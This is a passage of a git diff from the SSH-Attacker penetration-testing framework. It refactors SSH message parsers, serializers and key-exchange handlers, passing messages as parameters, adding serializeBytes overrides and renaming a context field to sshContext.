--- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestOpenSshHostKeysMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestOpenSshHostKeysMessageParser.java @@ -33,24 +33,26 @@ public GlobalRequestOpenSshHostKeysMessageParser(InputStream stream) { @Override public void parse(GlobalRequestOpenSshHostKeysMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - private void parseHostKeys() { + private void parseHostKeys(GlobalRequestOpenSshHostKeysMessage message) { message.setHostKeys(this.parseByteArrayField(this.getBytesLeft())); LOGGER.debug( "Host keys blob: {}", ArrayConverter.bytesToRawHexString(message.getHostKeys().getValue())); } - @Override - public GlobalRequestOpenSshHostKeysMessage createMessage() { - return new GlobalRequestOpenSshHostKeysMessage(); - } + /* + @Override + public GlobalRequestOpenSshHostKeysMessage createMessage() { + return new GlobalRequestOpenSshHostKeysMessage(); + } + */ @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseHostKeys(); + protected void parseMessageSpecificContents(GlobalRequestOpenSshHostKeysMessage message) { + super.parseMessageSpecificContents(message); + parseHostKeys(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParser.java index 3ed906693..1ade25dc5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestSuccessMessageParser.java @@ -29,14 +29,16 @@ public GlobalRequestSuccessMessageParser(InputStream stream) { @Override public void parse(GlobalRequestSuccessMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override - public GlobalRequestSuccessMessage createMessage() { - return new GlobalRequestSuccessMessage(); - } + /* + @Override + public GlobalRequestSuccessMessage createMessage() { + return new GlobalRequestSuccessMessage(); + } + */ @Override - protected void parseMessageSpecificContents() {} + protected void parseMessageSpecificContents(GlobalRequestSuccessMessage message) {} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestTcpIpForwardMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestTcpIpForwardMessageParser.java index e2ad5416d..63f572aa2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestTcpIpForwardMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestTcpIpForwardMessageParser.java @@ -35,10 +35,10 @@ public GlobalRequestTcpIpForwardMessageParser(InputStream stream) { @Override public void parse(GlobalRequestTcpIpForwardMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - private void parseIPAddressToBind() { + private void parseIPAddressToBind(GlobalRequestTcpIpForwardMessage message) { message.setIpAddressToBindLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("IP address to bind length: " + message.getIpAddressToBindLength().getValue()); message.setIpAddressToBind( @@ -47,20 +47,22 @@ private void parseIPAddressToBind() { LOGGER.debug("IP address to bind: " + message.getIpAddressToBind().getValue()); } - private void parsePortToBind() { + private void parsePortToBind(GlobalRequestTcpIpForwardMessage message) { message.setPortToBind(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Port to bind: " + message.getPortToBind().getValue()); } - @Override - public GlobalRequestTcpIpForwardMessage createMessage() { - return new GlobalRequestTcpIpForwardMessage(); - } + /* + @Override + public GlobalRequestTcpIpForwardMessage createMessage() { + return new GlobalRequestTcpIpForwardMessage(); + } + */ @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseIPAddressToBind(); - parsePortToBind(); + protected void parseMessageSpecificContents(GlobalRequestTcpIpForwardMessage message) { + super.parseMessageSpecificContents(message); + parseIPAddressToBind(message); + parsePortToBind(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestUnknownMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestUnknownMessageParser.java index 8e541aa70..1c0520aaa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestUnknownMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/parser/GlobalRequestUnknownMessageParser.java @@ -32,15 +32,15 @@ public GlobalRequestUnknownMessageParser(InputStream stream) { @Override public void parse(GlobalRequestUnknownMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override + /*@Override public GlobalRequestUnknownMessage createMessage() { return new GlobalRequestUnknownMessage(); - } + }*/ - public void parseTypeSpecificData() { + public void parseTypeSpecificData(GlobalRequestUnknownMessage message) { message.setTypeSpecificData(parseByteArrayField(getBytesLeft())); LOGGER.debug( "Type specific data: " @@ -49,8 +49,8 @@ public void parseTypeSpecificData() { } @Override - protected void parseMessageSpecificContents() { - super.parseMessageSpecificContents(); - parseTypeSpecificData(); + protected void parseMessageSpecificContents(GlobalRequestUnknownMessage message) { + super.parseMessageSpecificContents(message); + parseTypeSpecificData(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ConnectionMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ConnectionMessagePreparator.java new file mode 100644 index 000000000..15e4e3947 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/preparator/ConnectionMessagePreparator.java @@ -0,0 +1,40 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.connection.preparator; + +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ConnectionMessagePreparator extends ProtocolMessagePreparator { + private static final Logger LOGGER = LogManager.getLogger(); + + private final ConnectionMessage msg; + + public ConnectionMessagePreparator(Chooser chooser, ConnectionMessage message) { + super(chooser, message); + this.msg = message; + } + + @Override + protected void prepareProtocolMessageContents() { + LOGGER.debug("Preparing ApplicationMessage"); + prepareData(msg); + } + + private void prepareData(ConnectionMessage msg) { + if (msg.getDataConfig() != null) { + msg.setData(msg.getDataConfig()); + } else { + msg.setData(chooser.getLastHandledAuthenticationMessageData()); + } + LOGGER.debug("Data: {}", msg.getData().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java index 7bdec7182..df9924210 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java @@ -30,4 +30,10 @@ private void serializeRecipientChannel() { public void serializeMessageSpecificContents() { serializeRecipientChannel(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java index 6fde8e889..26361989b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java @@ -53,4 +53,10 @@ public void serializeMessageSpecificContents() { serializeWindowSize(); serializePacketSize(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ConnectionMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ConnectionMessageSerializer.java new file mode 100644 index 000000000..2b6b5aba3 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ConnectionMessageSerializer.java @@ -0,0 +1,40 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.connection.serializer; + +import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.connection.message.ConnectionMessage; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ConnectionMessageSerializer extends ProtocolMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + /** + * Constructor for the ApplicationMessageSerializer + * + * @param message Message that should be serialized + */ + public ConnectionMessageSerializer(ConnectionMessage message) { + super(message); + } + + @Override + protected byte[] serializeBytes() { + LOGGER.debug("Serializing ApplicationMessage"); + writeData(); + return getAlreadySerialized(); + } + + /** Writes the data of the ApplicationMessage into the final byte[] */ + private void writeData() { + appendBytes(message.getData().getValue()); + LOGGER.debug("Data: {}", message.getData().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java index c092045e7..68a6b52d1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java @@ -19,4 +19,10 @@ public GlobalRequestFailureMessageSerializer(GlobalRequestFailureMessage message @Override public void serializeMessageSpecificContents() {} + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java index 877afa0ad..9c9dda6f5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java @@ -45,4 +45,10 @@ public void serializeMessageSpecificContents() { serializeRequestName(); serializeWantReply(); } + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java index 70dee3bb4..1a6e57fbf 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java @@ -19,4 +19,10 @@ public GlobalRequestSuccessMessageSerializer(GlobalRequestSuccessMessage message @Override public void serializeMessageSpecificContents() {} + + @Override + protected byte[] serializeBytes() { + serializeMessageSpecificContents(); + return getAlreadySerialized(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeGroupMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeGroupMessageHandler.java index 1c4f1c624..46b037233 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeGroupMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeGroupMessageHandler.java @@ -32,13 +32,13 @@ public void adjustContext(DhGexKeyExchangeGroupMessage message) { } private void setGroupParametersFromMessage(DhGexKeyExchangeGroupMessage msg) { - DhKeyExchange keyExchange = context.getChooser().getDhGexKeyExchange(); + DhKeyExchange keyExchange = sshContext.getChooser().getDhGexKeyExchange(); keyExchange.setModulus(msg.getGroupModulus().getValue()); keyExchange.setGenerator(msg.getGroupGenerator().getValue()); } private void updateExchangeHashWithGroupParameters(DhGexKeyExchangeGroupMessage msg) { - ExchangeHashInputHolder inputHolder = context.getExchangeHashInputHolder(); + ExchangeHashInputHolder inputHolder = sshContext.getExchangeHashInputHolder(); inputHolder.setDhGexGroupModulus(msg.getGroupModulus().getValue()); inputHolder.setDhGexGroupGenerator(msg.getGroupGenerator().getValue()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeInitMessageHandler.java index 5aae6b33a..7aad08f6b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeInitMessageHandler.java @@ -29,10 +29,12 @@ public DhGexKeyExchangeInitMessageHandler(SshContext context) { @Override public void adjustContext(DhGexKeyExchangeInitMessage message) { - context.getChooser() + sshContext + .getChooser() .getDhGexKeyExchange() .setRemotePublicKey(message.getEphemeralPublicKey().getValue()); - context.getExchangeHashInputHolder() + sshContext + .getExchangeHashInputHolder() .setDhGexClientPublicKey(message.getEphemeralPublicKey().getValue()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeOldRequestMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeOldRequestMessageHandler.java index 5ba53f803..b65179219 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeOldRequestMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeOldRequestMessageHandler.java @@ -26,12 +26,13 @@ public DhGexKeyExchangeOldRequestMessageHandler(SshContext context) { @Override public void adjustContext(DhGexKeyExchangeOldRequestMessage message) { updateContextWithPreferredGroupSize(message); - context.setOldGroupRequestReceived(true); + sshContext.setOldGroupRequestReceived(true); } private void updateContextWithPreferredGroupSize(DhGexKeyExchangeOldRequestMessage message) { - context.setPreferredDhGroupSize(message.getPreferredGroupSize().getValue()); - context.getExchangeHashInputHolder() + sshContext.setPreferredDhGroupSize(message.getPreferredGroupSize().getValue()); + sshContext + .getExchangeHashInputHolder() .setDhGexPreferredGroupSize(message.getPreferredGroupSize().getValue()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeReplyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeReplyMessageHandler.java index 76e21a881..4d865a211 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeReplyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeReplyMessageHandler.java @@ -26,20 +26,23 @@ public DhGexKeyExchangeReplyMessageHandler(SshContext context) { @Override public void adjustContext(DhGexKeyExchangeReplyMessage message) { - KeyExchangeUtil.handleHostKeyMessage(context, message); + KeyExchangeUtil.handleHostKeyMessage(sshContext, message); updateContextWithRemotePublicKey(message); - KeyExchangeUtil.computeSharedSecret(context, context.getChooser().getDhGexKeyExchange()); - KeyExchangeUtil.computeExchangeHash(context); - KeyExchangeUtil.handleExchangeHashSignatureMessage(context, message); - KeyExchangeUtil.setSessionId(context); - KeyExchangeUtil.generateKeySet(context); + KeyExchangeUtil.computeSharedSecret( + sshContext, sshContext.getChooser().getDhGexKeyExchange()); + KeyExchangeUtil.computeExchangeHash(sshContext); + KeyExchangeUtil.handleExchangeHashSignatureMessage(sshContext, message); + KeyExchangeUtil.setSessionId(sshContext); + KeyExchangeUtil.generateKeySet(sshContext); } private void updateContextWithRemotePublicKey(DhGexKeyExchangeReplyMessage message) { - context.getChooser() + sshContext + .getChooser() .getDhGexKeyExchange() .setRemotePublicKey(message.getEphemeralPublicKey().getValue()); - context.getExchangeHashInputHolder() + sshContext + .getExchangeHashInputHolder() .setDhGexServerPublicKey(message.getEphemeralPublicKey().getValue()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeRequestMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeRequestMessageHandler.java index 09708ff03..0aefbd88d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeRequestMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhGexKeyExchangeRequestMessageHandler.java @@ -28,17 +28,17 @@ public DhGexKeyExchangeRequestMessageHandler(SshContext context) { public void adjustContext(DhGexKeyExchangeRequestMessage message) { updateContextWithAcceptableGroupSize(message); updateExchangeHashWithAcceptableGroupSize(message); - context.setOldGroupRequestReceived(false); + sshContext.setOldGroupRequestReceived(false); } private void updateContextWithAcceptableGroupSize(DhGexKeyExchangeRequestMessage message) { - context.setMinimalDhGroupSize(message.getMinimalGroupSize().getValue()); - context.setPreferredDhGroupSize(message.getPreferredGroupSize().getValue()); - context.setMaximalDhGroupSize(message.getMaximalGroupSize().getValue()); + sshContext.setMinimalDhGroupSize(message.getMinimalGroupSize().getValue()); + sshContext.setPreferredDhGroupSize(message.getPreferredGroupSize().getValue()); + sshContext.setMaximalDhGroupSize(message.getMaximalGroupSize().getValue()); } private void updateExchangeHashWithAcceptableGroupSize(DhGexKeyExchangeRequestMessage message) { - ExchangeHashInputHolder inputHolder = context.getExchangeHashInputHolder(); + ExchangeHashInputHolder inputHolder = sshContext.getExchangeHashInputHolder(); inputHolder.setDhGexMinimalGroupSize(message.getMinimalGroupSize().getValue()); inputHolder.setDhGexPreferredGroupSize(message.getPreferredGroupSize().getValue()); inputHolder.setDhGexMaximalGroupSize(message.getMaximalGroupSize().getValue()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeInitMessageHandler.java index 3d65e5586..55a0d1891 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeInitMessageHandler.java @@ -27,10 +27,12 @@ public DhKeyExchangeInitMessageHandler(SshContext context) { @Override public void adjustContext(DhKeyExchangeInitMessage message) { - context.getChooser() + sshContext + .getChooser() .getDhKeyExchange() .setRemotePublicKey(message.getEphemeralPublicKey().getValue()); - context.getExchangeHashInputHolder() + sshContext + .getExchangeHashInputHolder() .setDhClientPublicKey(message.getEphemeralPublicKey().getValue()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeReplyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeReplyMessageHandler.java index be0a9b9e8..e1df26637 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeReplyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DhKeyExchangeReplyMessageHandler.java @@ -24,20 +24,22 @@ public DhKeyExchangeReplyMessageHandler(SshContext context) { @Override public void adjustContext(DhKeyExchangeReplyMessage message) { - KeyExchangeUtil.handleHostKeyMessage(context, message); + KeyExchangeUtil.handleHostKeyMessage(sshContext, message); updateContextWithRemotePublicKey(message); - KeyExchangeUtil.computeSharedSecret(context, context.getChooser().getDhKeyExchange()); - KeyExchangeUtil.computeExchangeHash(context); - KeyExchangeUtil.handleExchangeHashSignatureMessage(context, message); - KeyExchangeUtil.setSessionId(context); - KeyExchangeUtil.generateKeySet(context); + KeyExchangeUtil.computeSharedSecret(sshContext, sshContext.getChooser().getDhKeyExchange()); + KeyExchangeUtil.computeExchangeHash(sshContext); + KeyExchangeUtil.handleExchangeHashSignatureMessage(sshContext, message); + KeyExchangeUtil.setSessionId(sshContext); + KeyExchangeUtil.generateKeySet(sshContext); } private void updateContextWithRemotePublicKey(DhKeyExchangeReplyMessage message) { - context.getChooser() + sshContext + .getChooser() .getDhKeyExchange() .setRemotePublicKey(message.getEphemeralPublicKey().getValue()); - context.getExchangeHashInputHolder() + sshContext + .getExchangeHashInputHolder() .setDhServerPublicKey(message.getEphemeralPublicKey().getValue()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DisconnectMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DisconnectMessageHandler.java index 03936b60a..f6d1be461 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DisconnectMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/DisconnectMessageHandler.java @@ -28,7 +28,7 @@ public DisconnectMessageHandler(SshContext context) { @Override public void adjustContext(DisconnectMessage message) { LOGGER.info("Received DisconnectMessage"); - context.setDisconnectMessageReceived(true); + sshContext.setDisconnectMessageReceived(true); } /*@Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeInitMessageHandler.java index e8dee5c7f..4ff499394 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeInitMessageHandler.java @@ -29,10 +29,12 @@ public EcdhKeyExchangeInitMessageHandler(SshContext context) { @Override public void adjustContext(EcdhKeyExchangeInitMessage message) { - context.getChooser() + sshContext + .getChooser() .getEcdhKeyExchange() .setRemotePublicKey(message.getEphemeralPublicKey().getValue()); - context.getExchangeHashInputHolder() + sshContext + .getExchangeHashInputHolder() .setEcdhClientPublicKey(message.getEphemeralPublicKey().getValue()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeReplyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeReplyMessageHandler.java index 9c60b1690..105ba2331 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeReplyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/EcdhKeyExchangeReplyMessageHandler.java @@ -26,20 +26,23 @@ public EcdhKeyExchangeReplyMessageHandler(SshContext context) { @Override public void adjustContext(EcdhKeyExchangeReplyMessage message) { - KeyExchangeUtil.handleHostKeyMessage(context, message); + KeyExchangeUtil.handleHostKeyMessage(sshContext, message); updateContextWithRemotePublicKey(message); - KeyExchangeUtil.computeSharedSecret(context, context.getChooser().getEcdhKeyExchange()); - KeyExchangeUtil.computeExchangeHash(context); - KeyExchangeUtil.handleExchangeHashSignatureMessage(context, message); - KeyExchangeUtil.setSessionId(context); - KeyExchangeUtil.generateKeySet(context); + KeyExchangeUtil.computeSharedSecret( + sshContext, sshContext.getChooser().getEcdhKeyExchange()); + KeyExchangeUtil.computeExchangeHash(sshContext); + KeyExchangeUtil.handleExchangeHashSignatureMessage(sshContext, message); + KeyExchangeUtil.setSessionId(sshContext); + KeyExchangeUtil.generateKeySet(sshContext); } private void updateContextWithRemotePublicKey(EcdhKeyExchangeReplyMessage message) { - context.getChooser() + sshContext + .getChooser() .getEcdhKeyExchange() .setRemotePublicKey(message.getEphemeralPublicKey().getValue()); - context.getExchangeHashInputHolder() + sshContext + .getExchangeHashInputHolder() .setEcdhServerPublicKey(message.getEphemeralPublicKey().getValue()); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeInitMessageHandler.java index 513636bdb..4b72a7e31 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeInitMessageHandler.java @@ -26,29 +26,31 @@ public HybridKeyExchangeInitMessageHandler(SshContext context) { @Override public void adjustContext(HybridKeyExchangeInitMessage message) { - context.getChooser() + sshContext + .getChooser() .getHybridKeyExchange() .getKeyAgreement() .setRemotePublicKey(message.getAgreementPublicKey().getValue()); - context.getChooser() + sshContext + .getChooser() .getHybridKeyExchange() .getKeyEncapsulation() .setRemotePublicKey(message.getEncapsulationPublicKey().getValue()); byte[] combined; - switch (context.getChooser().getHybridKeyExchange().getCombiner()) { + switch (sshContext.getChooser().getHybridKeyExchange().getCombiner()) { case POSTQUANTUM_CONCATENATE_CLASSICAL: combined = KeyExchangeUtil.concatenateHybridKeys( message.getEncapsulationPublicKey().getValue(), message.getAgreementPublicKey().getValue()); - context.getExchangeHashInputHolder().setHybridClientPublicKey(combined); + sshContext.getExchangeHashInputHolder().setHybridClientPublicKey(combined); break; case CLASSICAL_CONCATENATE_POSTQUANTUM: combined = KeyExchangeUtil.concatenateHybridKeys( message.getAgreementPublicKey().getValue(), message.getEncapsulationPublicKey().getValue()); - context.getExchangeHashInputHolder().setHybridClientPublicKey(combined); + sshContext.getExchangeHashInputHolder().setHybridClientPublicKey(combined); break; default: LOGGER.warn("combiner is not supported. Can not set Hybrid Key."); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeReplyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeReplyMessageHandler.java index bb38a4f05..b146b56ee 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeReplyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/HybridKeyExchangeReplyMessageHandler.java @@ -31,27 +31,31 @@ public HybridKeyExchangeReplyMessageHandler(SshContext context) { @Override public void adjustContext(HybridKeyExchangeReplyMessage message) { - KeyExchangeUtil.handleHostKeyMessage(context, message); + KeyExchangeUtil.handleHostKeyMessage(sshContext, message); setRemoteValues(message); - context.getChooser().getHybridKeyExchange().combineSharedSecrets(); - context.setSharedSecret(context.getChooser().getHybridKeyExchange().getSharedSecret()); - context.getExchangeHashInputHolder() - .setSharedSecret(context.getChooser().getHybridKeyExchange().getSharedSecret()); - KeyExchangeUtil.computeExchangeHash(context); - KeyExchangeUtil.handleExchangeHashSignatureMessage(context, message); - KeyExchangeUtil.setSessionId(context); - KeyExchangeUtil.generateKeySet(context); + sshContext.getChooser().getHybridKeyExchange().combineSharedSecrets(); + sshContext.setSharedSecret( + sshContext.getChooser().getHybridKeyExchange().getSharedSecret()); + sshContext + .getExchangeHashInputHolder() + .setSharedSecret(sshContext.getChooser().getHybridKeyExchange().getSharedSecret()); + KeyExchangeUtil.computeExchangeHash(sshContext); + KeyExchangeUtil.handleExchangeHashSignatureMessage(sshContext, message); + KeyExchangeUtil.setSessionId(sshContext); + KeyExchangeUtil.generateKeySet(sshContext); } private void setRemoteValues(HybridKeyExchangeReplyMessage message) { - context.getChooser() + sshContext + .getChooser() .getHybridKeyExchange() .getKeyAgreement() .setRemotePublicKey(message.getPublicKey().getValue()); LOGGER.info( "RemoteKey Agreement = " + ArrayConverter.bytesToRawHexString(message.getPublicKey().getValue())); - context.getChooser() + sshContext + .getChooser() .getHybridKeyExchange() .getKeyEncapsulation() .setEncryptedSharedSecret(message.getCombinedKeyShare().getValue()); @@ -60,25 +64,25 @@ private void setRemoteValues(HybridKeyExchangeReplyMessage message) { + ArrayConverter.bytesToRawHexString( message.getCombinedKeyShare().getValue())); byte[] combined; - switch 